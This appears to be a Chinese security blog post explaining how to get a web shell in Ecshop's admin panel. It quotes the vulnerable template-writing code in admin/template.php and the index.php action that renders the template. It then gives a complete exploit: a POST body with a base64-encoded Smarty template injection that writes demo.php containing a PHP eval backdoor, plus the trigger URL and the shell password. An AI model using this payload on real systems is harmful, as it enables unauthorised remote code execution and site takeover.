关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

利用post在Ecshop后台getshell的方法

 feng  443 ℃  0条点评
  1. admin/template.phpif ($_REQUEST['act'] == 'update_library')
  2. {
  3.     check_authz_json('library_manage');
  4.     $html = stripslashes(json_str_iconv($_POST['html']));
  5.     $lib_file = '../themes/' . $_CFG['template'] . '/library/' . $_POST['lib'] . '.lbi'; //模板文件
  6.     $lib_file = str_replace("0xa", '', $lib_file); // 过滤 0xa 非法字符
  7.     $org_html = str_replace("\xEF\xBB\xBF", '', file_get_contents($lib_file));
  8.     if (@file_exists($lib_file) === true && @file_put_contents($lib_file, $html))//写出
  9.     {
  10.         @file_put_contents('../temp/backup/library/' . $_CFG['template'] . '-' . $_POST['lib'] . '.lbi', $org_html);
  11.         make_json_result('', $_LANG['update_lib_success']);
  12.     }
  13.     else
  14.     {
  15.         make_json_error(sprintf($_LANG['update_lib_failed'], 'themes/' . $_CFG['template'] . '/library'));
  16.     }
  17. }

复制代码

那么找个比较方便调用了模板的文件
index.php

  1. if ($act == 'cat_rec')
  2. {
  3.     $rec_array = array(1 => 'best', 2 => 'new', 3 => 'hot');
  4.     $rec_type = !empty($_REQUEST['rec_type']) ? intval($_REQUEST['rec_type']) : '1';
  5.     $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : '0';
  6.     include_once('includes/cls_json.php');
  7.     $json = new JSON;
  8.     $result   = array('error' => 0, 'content' => '', 'type' => $rec_type, 'cat_id' => $cat_id);
  9.     $children = get_children($cat_id);
  10.     $smarty->assign($rec_array[$rec_type] . '_goods',      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推荐商品
  11.     $smarty->assign('cat_rec_sign', 1);
  12.     $result['content'] = $smarty->fetch('library/recommend_' . $rec_array[$rec_type] . '.lbi');//使用了模板文件 该模板文件为recommend_best
  13.         echo 'library/recommend_' . $rec_array[$rec_type] . '.lbi';
  14.         echo $rec_array[$rec_type];
  15.     die($json->encode($result));
  16. }

复制代码

那么就有利用方法了
post包到http://localhost/ec/admin/template.php?act=update_library
Post内容:

  1. lib=recommend_best&html={if fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}

复制代码

然后访问http://localhost/ec/index.php?act=cat_rec

shel地址:http://localhost/ec/demo.php

密码c

作者:Cond0r

本文标签:
phpliteadmin<=1.9.3漏洞登陆代码插入get Webshell
前半部分让我笑得不行了,后面让我哭的不行了
我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)某个商业定向攻击活动分析某个商业定向攻击活动分析

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码